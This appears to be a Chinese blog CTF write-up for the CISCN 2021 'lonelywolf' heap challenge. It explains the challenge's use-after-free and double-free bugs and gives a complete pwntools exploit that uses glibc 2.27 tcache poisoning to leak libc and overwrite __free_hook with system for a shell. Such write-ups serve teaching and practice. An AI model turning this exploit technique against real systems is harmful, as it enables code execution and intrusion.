NSSCTF[堆][tcache]

最新推荐文章于 2024-09-13 19:52:51 发布
最新推荐文章于 2024-09-13 19:52:51 发布
阅读量725 收藏 22
点赞数 17
分类专栏: pwn 文章标签: ctfer 笔记 pwn 堆入门 tcache
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yjh_fnu_ltn/article/details/140386854
版权

[CISCN 2021 初赛]lonelywolf

题目地址:[CISCN 2021 初赛]lonelywolf | NSSCTF
参照:https://nuoye-blog.github.io/2021/05/16/466a7375/

思路:

  1. 先看tcache结构,伪造一个0x91的chunk,为找0x91chunk的数量,再将其释放free进入unsortedbin来泄漏main_arena地址。

    image-20240712160527756

题目分析:

  1. 只能控制一个堆index只能位0,add函数,限制了不能申请大小为0x90的chunk:

    image-20240712174415106

  2. delete函数,heap指针没有清0,存在double free:

    image-20240712174547228

  3. edit函数,结合free函数,存在UAF漏洞,释放chunk后还能往里面写参数(可以修改next的值):

    image-20240712174638950

  4. show函数,同样存在UAF漏洞,可以打印释放后的chunk中的内容:

    image-20240712174751510

利用:

  1. 先申请一个大小为0x80的chunk,再double free泄漏tcache的基地址:

    # 泄漏tcache的基地址
add(0x78)
free()
edit(p64(0)*2)	#绕过double free的检查
free()
show()

p.recvuntil(b"Content: ")
tcache = (u64(p.recv(6).ljust(8,b'\x00'))&0xfffffffff000)
success("tcache==>"+hex(tcache))

    image-20240712175402058

  2. 修改chunk0x80的next指针,指向tcache+0x10的位置,然后两个申请得到tcache chunk0x251:

    # 修改tcachebin的next指针,指向tcache的基地址+0x10
payload = p64(tcache+0x10)
edit(payload)

add(0x78) 
add(0x78)   #申请得到tcache

    image-20240712175720770

  3. 伪造0x90chunk的数量,伪造0x80chunk的next地址指向tcache+0x260(后续用来伪装成0x90chunk),伪造0x70的next地址指向tcache+0x250(0x80的上面)(后续用来更改0x80chunk的size字段值):

    payload = b"\x00"*0x5+b'\x01'+b'\x01'+b"\x08"+p64(0)*(7+4)+p64(tcache+0x250)*2+p64(tcache+0x260)
edit(payload)

    image-20240712180651608

  4. 修改上面0x80chunk的size字段为0x91(伪造0x90大小的chunk),再申请一个小chunk将伪造的0x90chunk与topchunk隔开

    add(0x68)   #0x70 修改0x80chunk的size字段
payload = p64(0)+p64(0x91)+p64(0)
edit(payload)
add(0x38)   #将伪造的0x90chunk与TOP隔开
edit(b'\x00'*0x8+p64(0x31)) #由于前面申请的0x40chunk会在伪造的0x90chunk的数据域内部,所以在后面额外加上0x41的数据域大小

    不加 edit(b’\x00’*0x8+p64(0x31)):(必须是0x40+0x30或者0x30+0x20,不然会报错)

    image-20240712181413019

    加上 edit(b’\x00’*0x8+p64(0x31)):

    image-20240712181629240

  5. 申请0x80chunk(实际上申请的时0x90chunk),然后释放活得main_arena中的地址:

    add(0x78)   #表面上申请0x80chunk,实际上申请的时0x90chunk
free()
show()

addr = u64(p.recvuntil(b"\x7f")[-6:].ljust(8,b'\x00'))
success("main_arena_unsortbin_addr==>"+hex(addr))
main_arena_offset = libc.symbols["__malloc_hook"]+0x10
success("main_arena_offset==>"+hex(main_arena_offset))
libc_base = addr-(main_arena_offset+0x60)
success("libc_addr==>"+hex(libc_base))

    image-20240712182011615

  6. 再申请0x40的chunk,释放后修改其next指针指向**__free_hook-0x8**地址(因为tcache在申请时不检查size字段,所以不用看__free_hook-0x8前面的size字段值):

    system_addr = libc_base+libc.sym["system"]
free_hook_addr = libc_base+libc.sym["__free_hook"]
success("system_addr==>"+hex(system_addr))
success("free_hook_addr==>"+hex(free_hook_addr))

add(0x28)
free()
payload = p64(free_hook_addr-8)
edit(payload)

    image-20240712182813509

  7. 两次申请后得到该地址,再向该地址写入 b"/bin/sh\x00"+p64(system_addr),最后free执行system(“/bi/sh”):

    add(0x28)
add(0x28)
payload = b'/bin/sh\x00'+p64(system_addr)
edit(payload)
free()

  8. 完整EXP:

    from pwn import *
from LibcSearcher import *

context(os='linux', arch='amd64', log_level='debug')

# p = remote("node4.anna.nssctf.cn",28516)
p = process("./pwn")
libc = ELF('/home/kali/Desktop/glibc-all-in-one/libs/2.27-3ubuntu1_amd64/libc-2.27.so')
elf = ELF("./pwn")

n2b = lambda x    : str(x).encode()
rv  = lambda x    : p.recv(x)
ru  = lambda s    : p.recvuntil(s)
sd  = lambda s    : p.send(s)
sl  = lambda s    : p.sendline(s)
sn  = lambda s    : sl(n2b(n))
sa  = lambda t, s : p.sendafter(t, s)
sla = lambda t, s : p.sendlineafter(t, s)
sna = lambda t, n : sla(t, n2b(n))
ia  = lambda      : p.interactive()
rop = lambda r    : flat([p64(x) for x in r])


def add(size):
    sla(b'choice:',b'1')
    sla(b':',str(0))
    sla(b':',str(size))

def edit(content):
    sla(b':',b'2')
    sla(b':',b'0')
    sla(b':',content)

def show():
    p.sendlineafter(b':',b'3')
    p.sendlineafter(b':',b"0")

def free():
    sla(b': ',b'4')
    sla(b': ',b'0')

# 泄漏tcache的基地址
add(0x78)
free()
edit(p64(0)*2)
free()
show()

p.recvuntil(b"Content: ")
tcache = (u64(p.recv(6).ljust(8,b'\x00'))&0xfffffffff000)
success("tcache==>"+hex(tcache))

# 修改tcachebin的next指针,指向tcache的基地址+0x10
payload = p64(tcache+0x10)
edit(payload)

add(0x78) 
add(0x78)   #申请得到tcache

payload = b"\x00"*0x5+b'\x01'+b'\x01'+b"\x08"+p64(0)*(7+4)+p64(tcache+0x250)*2+p64(tcache+0x260)
edit(payload)

add(0x68)   #0x70 修改0x80chunk的size字段
payload = p64(0)+p64(0x91)+p64(0)
edit(payload)

add(0x38)   #将伪造的0x90chunk与TOP隔开
edit(b'\x00'*0x8+p64(0x41))
add(0x78)   #表面上申请0x80chunk,实际上申请的时0x90chunk

free()
show()
addr = u64(p.recvuntil(b"\x7f")[-6:].ljust(8,b'\x00'))
success("main_arena_unsortbin_addr==>"+hex(addr))
main_arena_offset = libc.symbols["__malloc_hook"]+0x10
success("main_arena_offset==>"+hex(main_arena_offset))
libc_base = addr-(main_arena_offset+0x60)
success("libc_addr==>"+hex(libc_base))

system_addr = libc_base+libc.sym["system"]
free_hook_addr = libc_base+libc.sym["__free_hook"]
success("system_addr==>"+hex(system_addr))
success("free_hook_addr==>"+hex(free_hook_addr))

add(0x38)
free()
payload = p64(free_hook_addr-8)
edit(payload)

add(0x38)
add(0x38)
payload = b'/bin/sh\x00'+p64(system_addr)
edit(payload)

free()
p.sendline(b"cat flag")
p.interactive()

    成功拿到本地flag:

    image-20240712183148198

波克比QWQ
关注
专栏目录
exit_hook和setcontext
yjh_fnu_ltn的博客
09-01 1279
exit_hook在pwn题中的应用 - 不会修电脑 - 博客园 (cnblogs.com)exit_hook :是程序在执行exit函数时,会去该位置拿一个函数指针,进而执行的一段程序,如果能修改掉这个函数指针就能挟持程序的控制流,执行想要的gadget。exit(0);return 0;这里用libc-2.32.so演示一下exit的调用过程:先进__run_exit_handlers函数:这里会调用到**_dl_fini函数** ,进入:_dl_fini函数开头的for循环中就调用到了。
[tcache double free] Mynote
huzai9527的博客
07-11 502
[tcache double free] 1. ida分析 存在double free 以及 uaf 题目给的libc是早期的可以进行double free的2.27版本 关于如何使用题目提供的libc进行调试,看ctf-pwn-patchelf-用题目给的libc运行二进制文件 2.思路 先填满tcache,使用unstored bin泄漏libc的地(这里只能申请9个chunk,可以将chunk 0 释放7次,填满tcache) 利用double free修改free_hook为system
[利用:TCache机制]hauseofAtum
Nashi_Ko的博客
03-27 612
[利用:TCache机制]hauseofAtum 题目链接:https://github.com/blue-lotus/BCTF2018/tree/master/pwn/houseofAtum 0x00 逆向分析 菜单: __int64 menu() { puts("1. new"); puts("2. edit"); puts("3. delete"); puts("4. show"); printf("Your choice:"); return getint(); } 功能
tcache attack
yjh_fnu_ltn的博客
07-25 1037
在 tcache 中新增了两个结构体,分别是和其中有两个重要的函数,和这两个函数会在函数和的开头被调用,其中tcache_put当所请求的分配大小0x4087。7再复习一遍在tcache_get中,仅仅检查了,此外,我们可以将 tcache 当作一个类似于 fastbin 的单独链表,只是它的 check,并没有 fastbin 那么复杂,仅仅检查。
Tcache Stashing Unlink Attack
seaaseesa的博客
05-01 1974
Tcache Stashing Unlink Attack Tcache Stashing Unlink Attack就是calloc的分配不从tcache bin里取chunk,calloc会遍历fastbin、small bin、large bin,如果在tcache bin里,对应的size的bin不为空,则会将这些bin的chunk采用头插法插入到tcache bin里。首先,我们来看一...
伪造unsortedbin释放时 top chunk的衔接问题
yjh_fnu_ltn的博客
07-31 449
释放一个unsorted bin:首先判断是否与top chunk相邻,相邻则直接回归top chunk然后,判断与其相邻的chunk是否被释放:低地处的chunk,直接用当前待释放的chunk的prev_inuse判断。高地处的chunk,用下下个chunk(高地)的prev_inuse位来判断。判断如果相邻的chunk也被释放的话,就会和待释放的chunk合并(要对前面判断的已释放的chunk进行完整性检查)如果相邻的chunk都未释放。
house of emma
yjh_fnu_ltn的博客
09-07 1200
house of cat 实际上任然是利用 IO_FILE 的指针,其中一个思想就是连续伪造两个IO_FILE :第一个覆盖fs:0x30,第二个 来覆盖 函数指针。如果在其他利用时,需要绕过加密,就可以采用这种方法。(走house of cat其实是一种更好的选着,只需要伪造一个IO_FILE即可)
house of cat
yjh_fnu_ltn的博客
09-03 1184
house of cat主要的摸底还是覆盖vtable指针,因为在glibc-2.24之后vtable新增了检查,导致直接覆盖vtable为system行不通,所以需要利用_IO_jump_t中的函数(这样能绕过vtable的判断)来挟持程序的控制流。glibc 2.24 下 IO_FILE 的利用,house of cat可以通过伪造IO_FILE走FOSP或者**__malloc_assert** 来完成攻击。
glibc 2.24 下 IO_FILE 的利用
yjh_fnu_ltn的博客
08-22 968
在 2.24 版本的 glibc 中,全新加入了针对 IO_FILE_plus 的vtable 劫持的检测措施,glibc 会在调用虚函数之前首先检查 vtable 地的合法性。首先会验证 vtable 是否位于_IO_vtable 段中,如果满足条件就正常执行,否则会调用_IO_vtable_check 做进一步检查。otherwise,if (__glibc_unlikely (offset >= section_length)) // 超出范围#endifreturn;
TCache-开源
04-25
TCache,作为一款开源的高性能键/值存储组件,旨在为现有的分布式内存对象缓存系统如Memcached或Dynamo提供增强的功能,以提升动态Web应用程序的速度并减轻数据库的负载。这款工具的核心价值在于其能够有效地缓存...
利用 TCache attack(libc2.26)
c_z_y_c_z_x的博客
05-08 292
在TCache机制中,它为每个线程创建一个缓存,里面包含一些小块,无需对arena上锁即可使用,这种无锁分配算法能有不错的效率提升。在Glibc的2.26中 新增了Tcache机制 这是ptmalloc2的Tcache在glibc中是默认开启的,在Tcache被开启的时候会定义如下东西Tcache为每个线程都预留了这样一个特殊的bins, bin的数量是64个 每个bin中最多缓存7个chunk。在64位系统上以0x10的字节递增,。32位系统上则,所以Tcache缓存的是。
glibc2.29溢出tcache的利用方式及原理
Hello World.c
03-06 8164
ibc2.29 溢出tcache的利用方式及原理 Dancing With Heap 与共舞 二进制学习之旅 参考资料: ctf-pwn https://ctf-wiki.github.io/ctf-wiki/pwn/linux/glibc-heap/tcache_attack/#tcache-poisoning glibc wiki https://sourceware.org/glib...
pwn 入门之tcache
清霂的博客
05-13 540
目录ciscn_final_3ciscn_2019_es_1 ciscn_final_3 #!/usr/bin/env python3 # coding=utf-8 from pwn import * arch = "amd64" filename = "ciscn_final_3" context(os="linux", arch=arch, log_level="debug") content = 0 offset = 0 # elf elf = ELF(filename) # libc l
CTF pwn入门 -- Tcache bin
lifanxin的博客
04-06 4014
Tcache attack序言概述攻击方式绕过Tcache分配到目的地tcache poisoningtcache house of spirit总结 序言 无奈于pwn题中与相关的东西实在是比较多,加上到了2021年的现在,ctf比赛中一来就是题,还都是新版本libc,对我这种新手中的新手实在不太友好,以此写下这个系列文章,记录自己学习漏洞利用过程中的点滴,同时也是个总结吧。结合自己做题的理解,将攻击常见的手段和方式按照一定的规律记录下来。本文章系列将分成五大块,即tcache attack
C++学习笔记----6、内存管理(五)---- 智能指针(3)
weixin_71738303的博客
09-11 1186
与指向特定类型的原始指针可以转化为不同类型的指针一样,shared_ptr保存特定的类型可以转化为一个另一种类型的shared_ptr。转化shared_ptr的函数是const_pointer_cast(),dynamic_pointer_cast(),static_pointer_cast()和reinterpret_pointer_cast()。前面简要提过,当拥有共享属主的智能指针,例如shared_ptr不在活动范围或者被重置时,只有它是最后指向的智能指针时才能释放其指向的资源。
arm和riscv系统调用对比(笔记)
最新发布
maosql
09-13 564
相似之处: ecall 和 SVC 都是用于从用户模式切换到内核模式,执行系统调用。它们的作用和使用方式非常相似,都是触发内核级别的处理,以处理用户请求的特权操作。不同之处: PendSV 是一个用于任务切换的中断机制,与 ecall 和 SVC 的作用不同。PendSV 主要用于上下文切换,而 ecall 和 SVC 是用于请求系统服务的机制。
shader 案例学习笔记之将坐标系分成4个象限
localhost
09-13 214
坐标系被分成了4个单元格,每个单元格都有唯一的索引,后续就可以根据索引去渲染。
tcache的使用方法
07-22
`tcache`是glibc中的一种内存管理机制,用于高效地管理小块内存分配和释放。以下是`tcache`的使用方法: 1. 分配内存:使用`malloc()`函数分配内存时,glibc会自动将小于等于`tcache`的大小的内存块放入`tcache`中。例如,如果您分配了一个小于等于`0x410`字节的内存块,它将被放入`tcache`中。 2. 释放内存:使用`free()`函数释放内存时,glibc会将内存块放回对应大小的`tcache`中。如果`tcache`已满,则可能会将内存块放入fastbins或其他bin中。 3. 重复分配和释放:如果您反复分配和释放相同大小的内存块,glibc会尽可能地从`tcache`中分配和释放。这种重复利用`tcache`可以提高性能。 4. `tcache`的大小:在不同版本的glibc中,`tcache`的大小可能会有所不同。通常,较新版本的glibc将`tcache`的大小设置为64个不同的链表,每个链表对应一种特定大小的内存块。 5. 线程局部`tcache`:每个线程都有自己的`tcache`,这意味着不同线程之间的`tcache`是独立的。这可以提高多线程程序的性能。 需要注意的是,`tcache`机制是glibc特有的,并不是C标准库的一部分。因此,它的行为和实现方式可能会因glibc版本而异。如果您对特定版本的glibc中的`tcache`机制有更详细的问题或疑问,建议查阅相关文档或参考glibc源代码。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值